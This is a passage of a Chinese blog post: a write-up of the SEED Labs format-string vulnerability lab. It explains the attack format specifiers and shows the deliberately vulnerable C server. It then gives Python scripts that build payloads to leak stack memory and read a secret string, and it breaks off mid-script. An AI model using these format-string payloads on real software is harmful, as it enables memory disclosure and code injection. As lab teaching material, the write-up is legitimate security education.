<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="SEEDLAB-FORMAT_STRING, Yssx&#39;s Blog">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>SEEDLAB-FORMAT_STRING | Yssx&#39;s Blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 8.1.1"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Yssx&#39;s Blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Yssx&#39;s Blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/Yssx-g" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/Yssx-g" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/8.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">SEEDLAB-FORMAT_STRING</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/SEED-LAB/">
                                <span class="chip bg-color">SEED_LAB</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E8%BD%AF%E4%BB%B6%E5%AE%89%E5%85%A8/" class="post-category">
                                软件安全
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2026-05-24
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    3.4k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    14 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="格式化字符串漏洞实验"><a href="#格式化字符串漏洞实验" class="headerlink" title="格式化字符串漏洞实验"></a>格式化字符串漏洞实验</h1><p>本文将利用格式化字符串漏洞进行代码注入，栈布局以及反向shell。实验环境采用实验网址下的docker容器</p>
<p>在格式化字符串漏洞利用中，攻击者并非随意使用所有格式符，而是精心选择几个特殊的格式符来达成信息泄露和任意内存写入。本文将系统介绍这些攻击专用的格式化字符及其原理。</p>
<h2 id="格式符介绍"><a href="#格式符介绍" class="headerlink" title="格式符介绍"></a>格式符介绍</h2><h3 id="1-x-–-以十六进制输出栈上的值"><a href="#1-x-–-以十六进制输出栈上的值" class="headerlink" title="1. %x – 以十六进制输出栈上的值"></a>1. <code>%x</code> – 以十六进制输出栈上的值</h3><ul>
<li><strong>作用</strong>：从栈上取出一个4字节整数，以十六进制形式输出。</li>
<li><strong>攻击用途</strong>：逐个泄露栈上的数据（如返回地址、canary、其他指针）。</li>
<li><strong>示例</strong>：<br>输入 <code>%x.%x.%x</code> 可能输出 <code>ffffd1f8.8048000.41414141</code>，从中可以推断栈布局。</li>
</ul>
<h3 id="2-p-–-输出指针（通常带-0x-前缀）"><a href="#2-p-–-输出指针（通常带-0x-前缀）" class="headerlink" title="2. %p – 输出指针（通常带 0x 前缀）"></a>2. <code>%p</code> – 输出指针（通常带 <code>0x</code> 前缀）</h3><ul>
<li><strong>作用</strong>：与 <code>%x</code> 类似，但更规范地输出指针格式。</li>
<li><strong>攻击用途</strong>：同 <code>%x</code>，用于泄露地址。</li>
</ul>
<h3 id="3-s-–-读取任意地址的字符串"><a href="#3-s-–-读取任意地址的字符串" class="headerlink" title="3. %s – 读取任意地址的字符串"></a>3. <code>%s</code> – 读取任意地址的字符串</h3><ul>
<li><strong>作用</strong>：从栈上取出一个4字节值作为内存地址，然后输出该地址处的字节序列，直到遇到 <code>\0</code>。</li>
<li><strong>攻击用途</strong>：实现<strong>任意地址读</strong>。攻击者需要事先将目标地址（如 secret 地址、GOT 表项地址）写入栈中，然后用 <code>%s</code> 解引用。如果该地址可读，其内容将被输出。</li>
<li><strong>示例</strong>：<br>输入 <code>\x08\x40\x0b\x08%7$s</code>（地址 0x080b4008 放在第7个参数位置），即可读取该地址处的字符串。</li>
</ul>
<h3 id="4-位置参数-n-与上述格式符结合"><a href="#4-位置参数-n-与上述格式符结合" class="headerlink" title="4. 位置参数 %n$ 与上述格式符结合"></a>4. 位置参数 <code>%n$</code> 与上述格式符结合</h3><ul>
<li><strong>作用</strong>：直接指定使用第 <code>n</code> 个参数，避免繁琐的 <code>%x</code> 填充。</li>
<li><strong>攻击用途</strong>：精确控制哪个参数被读取或写入。例如 <code>%7$s</code> 表示使用第7个参数作为 <code>%s</code> 的地址；<code>%7$x</code> 输出第7个参数的值。</li>
</ul>
<h3 id="5-n-–-写入已输出字符数"><a href="#5-n-–-写入已输出字符数" class="headerlink" title="5. %n – 写入已输出字符数"></a>5. <code>%n</code> – 写入已输出字符数</h3><ul>
<li><strong>作用</strong>：将<strong>当前已经输出的字符总数</strong>（一个 <code>int</code>）写入到指定地址。</li>
<li><strong>攻击用途</strong>：实现<strong>任意地址写</strong>。攻击者可以将目标地址（如返回地址、函数指针、GOT 条目）放在栈上，然后用 <code>%n</code> 向该地址写入一个值。配合宽度控制（如 <code>%1000x</code>），可以精确控制写入的数值。</li>
<li><strong>示例</strong>：<br>输入 <code>AAAA%7$n</code>，假设 <code>AAAA</code> 的地址是第7个参数，那么 <code>%7$n</code> 会将已输出的字符数（4，即四个 ‘A’）写入到栈上 <code>AAAA</code> 所在的位置（即地址 <code>0x41414141</code>，通常是非法的，所以需要将真实目标地址放在栈上）。</li>
</ul>
<h3 id="6-hn-–-写入两个字节（short）"><a href="#6-hn-–-写入两个字节（short）" class="headerlink" title="6. %hn – 写入两个字节（short）"></a>6. <code>%hn</code> – 写入两个字节（short）</h3><ul>
<li><strong>作用</strong>：写入 <code>short</code>（2字节），而不是 <code>int</code>。</li>
<li><strong>攻击用途</strong>：当需要写入的值较大（&gt;65535）时，分两次写入，每次写入两个字节，避免使用超长宽度导致 payload 过大。</li>
</ul>
<h3 id="7-hhn-–-写入一个字节（char）"><a href="#7-hhn-–-写入一个字节（char）" class="headerlink" title="7. %hhn – 写入一个字节（char）"></a>7. <code>%hhn</code> – 写入一个字节（char）</h3><ul>
<li><strong>作用</strong>：写入 <code>char</code>（1字节）。</li>
<li><strong>攻击用途</strong>：精细控制写入的每个字节，常用于覆盖返回地址的低位或逐个修改 GOT 表项。可以结合多个 <code>%hhn</code> 实现任意数值的精确写入。</li>
</ul>
<h3 id="8-lln-–-写入八个字节（long-long）"><a href="#8-lln-–-写入八个字节（long-long）" class="headerlink" title="8. %lln – 写入八个字节（long long）"></a>8. <code>%lln</code> – 写入八个字节（long long）</h3><ul>
<li><strong>作用</strong>：写入 64 位整数。</li>
<li><strong>攻击用途</strong>：在 64 位程序中覆盖 64 位指针或返回地址。</li>
</ul>
<p>虽然 <code>%x</code> 和 <code>%c</code> 本身不是写操作，但它们可以<strong>控制已输出字符的数量</strong>，从而配合 <code>%n</code> 系列实现精确数值写入。</p>
<ul>
<li><strong>原理</strong>：<code>%100x</code> 会输出至少100个字符（不足用空格填充），因此 <code>%100x%n</code> 会向目标地址写入 100。</li>
<li><strong>技巧</strong>：通过组合多个宽度控制，可以构造任意大小的数字。例如，要写入 0x1234，可以先输出 0x1234 个字符（通常拆分为多个小块，如 <code>%0x1234x</code> 不合法，需用 <code>%4660x</code> 或分两次用 <code>%hn</code>）。</li>
</ul>
<p>实际上，更常用的方法是利用 <code>%hn</code> 或 <code>%hhn</code> 分字节写入，避免输出几十万个字符。</p>
<table>
<thead>
<tr>
<th>目标</th>
<th>核心格式符</th>
<th>辅助手段</th>
</tr>
</thead>
<tbody><tr>
<td>泄露栈数据</td>
<td><code>%x</code>, <code>%p</code> + 位置参数</td>
<td>多个 <code>%x</code> 或 <code>%N$x</code></td>
</tr>
<tr>
<td>读取任意地址内容</td>
<td><code>%s</code> + 位置参数</td>
<td>将目标地址放入栈中</td>
</tr>
<tr>
<td>向任意地址写入小整数</td>
<td><code>%n</code></td>
<td>宽度控制，如 <code>%100x</code></td>
</tr>
<tr>
<td>写入大整数或精确控制</td>
<td><code>%hn</code>, <code>%hhn</code></td>
<td>分字节&#x2F;分字写入，逐个修改</td>
</tr>
<tr>
<td>跳过不需要的参数</td>
<td>位置参数 <code>%N$</code></td>
<td>直接指定第 N 个参数，避免填充</td>
</tr>
</tbody></table>
<p>假设漏洞代码：<code>printf(user_input);</code></p>
<h3 id="泄露栈上第7个参数的值"><a href="#泄露栈上第7个参数的值" class="headerlink" title="泄露栈上第7个参数的值"></a>泄露栈上第7个参数的值</h3><pre class="line-numbers language-none"><code class="language-none">%7$x<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="读取地址-0x080b4008-处的字符串"><a href="#读取地址-0x080b4008-处的字符串" class="headerlink" title="读取地址 0x080b4008 处的字符串"></a>读取地址 0x080b4008 处的字符串</h3><p>（需要提前确定偏移为7，且地址不含 <code>\0</code> 字节）</p>
<pre class="line-numbers language-none"><code class="language-none">python -c &#39;import sys; sys.stdout.buffer.write(b&quot;\x08\x40\x0b\x08%7$s&quot;)&#39;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="向地址-0x080e5068-写入-0x1234"><a href="#向地址-0x080e5068-写入-0x1234" class="headerlink" title="向地址 0x080e5068 写入 0x1234"></a>向地址 0x080e5068 写入 0x1234</h3><p>（使用 <code>%hn</code>，先输出 0x1234 个字符，但 0x1234 &#x3D; 4660，可拆分为两次写入）<br>实际上更简单：直接输出 0x1234 个字符很困难，所以分两次写入高低位：</p>
<pre class="line-numbers language-none"><code class="language-none">目标地址 0x080e5068（存放低16位）和 0x080e506a（存放高16位）
payload &#x3D; pack(&quot;&lt;I&quot;, 0x080e5068) + pack(&quot;&lt;I&quot;, 0x080e506a) + b&quot;%4660x%7$hn%?x%8$hn&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>（实际操作需精确计算字符数，此处略）</p>
<h2 id="任务一：使程序崩溃"><a href="#任务一：使程序崩溃" class="headerlink" title="任务一：使程序崩溃"></a>任务一：使程序崩溃</h2><p>首先我们来看一下漏洞程序源代码，可以看到，格式化字符串漏洞位于22行的printf（msg）</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;unistd.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;string.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;sys/socket.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;netinet/ip.h></span></span>

<span class="token keyword">unsigned</span> <span class="token keyword">int</span>  target <span class="token operator">=</span> <span class="token number">0x11223344</span><span class="token punctuation">;</span>
<span class="token keyword">char</span> <span class="token operator">*</span>secret <span class="token operator">=</span> <span class="token string">"A secret message\n"</span><span class="token punctuation">;</span>
<span class="token keyword">void</span> <span class="token function">dummy_function</span><span class="token punctuation">(</span><span class="token keyword">char</span> <span class="token operator">*</span>str<span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">void</span> <span class="token function">myprintf</span><span class="token punctuation">(</span><span class="token keyword">char</span> <span class="token operator">*</span>msg<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">int</span> <span class="token operator">*</span>framep<span class="token punctuation">;</span>
    <span class="token comment">// Save the ebp value into framep</span>
    <span class="token keyword">asm</span><span class="token punctuation">(</span><span class="token string">"movl %%ebp, %0"</span> <span class="token operator">:</span> <span class="token string">"=r"</span><span class="token punctuation">(</span>framep<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"Frame Pointer (inside myprintf):      0x%.8x\n"</span><span class="token punctuation">,</span> <span class="token punctuation">(</span><span class="token keyword">unsigned</span> <span class="token keyword">int</span><span class="token punctuation">)</span> framep<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"The target variable's value (before): 0x%.8x\n"</span><span class="token punctuation">,</span>   target<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token comment">// This line has a format-string vulnerability</span>
    <span class="token function">printf</span><span class="token punctuation">(</span>msg<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"The target variable's value (after):  0x%.8x\n"</span><span class="token punctuation">,</span>   target<span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token punctuation">&#125;</span>

<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token keyword">int</span> argc<span class="token punctuation">,</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token operator">*</span>argv<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">char</span> buf<span class="token punctuation">[</span><span class="token number">1500</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"The input buffer's address:    0x%.8x\n"</span><span class="token punctuation">,</span>   <span class="token punctuation">(</span><span class="token keyword">unsigned</span> <span class="token keyword">int</span><span class="token punctuation">)</span>  buf<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"The secret message's address:  0x%.8x\n"</span><span class="token punctuation">,</span>   <span class="token punctuation">(</span><span class="token keyword">unsigned</span> <span class="token keyword">int</span><span class="token punctuation">)</span>  secret<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"The target variable's address: 0x%.8x\n"</span><span class="token punctuation">,</span>   <span class="token punctuation">(</span><span class="token keyword">unsigned</span> <span class="token keyword">int</span><span class="token punctuation">)</span>  <span class="token operator">&amp;</span>target<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"Waiting for user input ......\n"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token keyword">int</span> length <span class="token operator">=</span> <span class="token function">fread</span><span class="token punctuation">(</span>buf<span class="token punctuation">,</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span><span class="token keyword">char</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token number">1500</span><span class="token punctuation">,</span> <span class="token constant">stdin</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"Received %d bytes.\n"</span><span class="token punctuation">,</span> length<span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token function">dummy_function</span><span class="token punctuation">(</span>buf<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"(^_^)(^_^)  Returned properly (^_^)(^_^)\n"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> <span class="token number">1</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">void</span> <span class="token function">dummy_function</span><span class="token punctuation">(</span><span class="token keyword">char</span> <span class="token operator">*</span>str<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">char</span> dummy_buffer<span class="token punctuation">[</span>BUF_SIZE<span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token function">memset</span><span class="token punctuation">(</span>dummy_buffer<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> BUF_SIZE<span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token function">myprintf</span><span class="token punctuation">(</span>str<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>此处任务一我们只考虑让程序崩溃，可通过访问非法地址的方式完成该任务。由于myprintf函数中变量很少，因此我们通过%n的方式，通过非法内存写入造成程序崩溃</p>
<p>正常通信时产生的回显如下图所示，将会在末尾打印正常返回信息</p>
<p><img src="/2026/05/24/seedlab-format-string/1779605921261.png" alt="正常回显"></p>
<p>接下来使用带有%n的字符串进行测试，发现服务器未能正常返回，成功使其崩溃</p>
<p><img src="/2026/05/24/seedlab-format-string/1779606008080.png" alt="带%n的结果"></p>
<h2 id="任务二：打印程序内存"><a href="#任务二：打印程序内存" class="headerlink" title="任务二：打印程序内存"></a>任务二：打印程序内存</h2><h3 id="观测偏移"><a href="#观测偏移" class="headerlink" title="观测偏移"></a>观测偏移</h3><p>为观测内存内容，我们可以使用%p来打印，为获取栈上内容，我们可以在格式化字符串首塞入特定字符，接上足够长的%p，获取到该字符位置在栈上的偏移量（也可以说在格式化字符中的第几个参数处），为此我们构造代码如下</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#!/usr/bin/python3</span>
<span class="token keyword">import</span> sys
N <span class="token operator">=</span> <span class="token number">1500</span>
content <span class="token operator">=</span> <span class="token builtin">bytearray</span><span class="token punctuation">(</span><span class="token number">0x0</span> <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span>N<span class="token punctuation">)</span><span class="token punctuation">)</span>
content<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">:</span><span class="token number">4</span><span class="token punctuation">]</span>  <span class="token operator">=</span>  <span class="token punctuation">(</span><span class="token string">"AAAA"</span><span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'latin-1'</span><span class="token punctuation">)</span>
s<span class="token operator">=</span><span class="token string">""</span>
<span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">70</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
	s <span class="token operator">+=</span> <span class="token string">"%.8p."</span><span class="token operator">+</span><span class="token builtin">str</span><span class="token punctuation">(</span>i<span class="token punctuation">)</span><span class="token operator">+</span><span class="token string">"-"</span> <span class="token comment">#+ "%n"</span>
fmt  <span class="token operator">=</span> <span class="token punctuation">(</span>s<span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'latin-1'</span><span class="token punctuation">)</span>
content<span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">:</span><span class="token number">4</span><span class="token operator">+</span><span class="token builtin">len</span><span class="token punctuation">(</span>fmt<span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> fmt
<span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'badfile'</span><span class="token punctuation">,</span> <span class="token string">'wb'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
  f<span class="token punctuation">.</span>write<span class="token punctuation">(</span>content<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>以上代码片段构造了足够多的%p用于查看栈上内容并按照参数顺序为其标号。将最终的字符串输入到文件中供我们调用。其运行结果如下</p>
<p>可以发现，字符串高位四字节的内容被作为了第64个参数进行解析，如果我们想要对AAAA处地址内容进行修改，只需要使用%n向其中写入数据即可</p>
<p><img src="/2026/05/24/seedlab-format-string/1779607021475.png"></p>
<h3 id="打印secret字符串内容"><a href="#打印secret字符串内容" class="headerlink" title="打印secret字符串内容"></a>打印secret字符串内容</h3><p>已知栈上地址偏移为64，又知%s可以打印出指定地址起始的字符串。同时通过服务器的回显获取了secret字符串的信息，因此我们使用%64$s，直接打印出第64个参数地址中的内容，代码如下</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#!/usr/bin/python3</span>
<span class="token keyword">import</span> sys
N <span class="token operator">=</span> <span class="token number">1500</span>
content <span class="token operator">=</span> <span class="token builtin">bytearray</span><span class="token punctuation">(</span><span class="token number">0x0</span> <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span>N<span class="token punctuation">)</span><span class="token punctuation">)</span>

number  <span class="token operator">=</span> <span class="token number">0x080b4008</span>
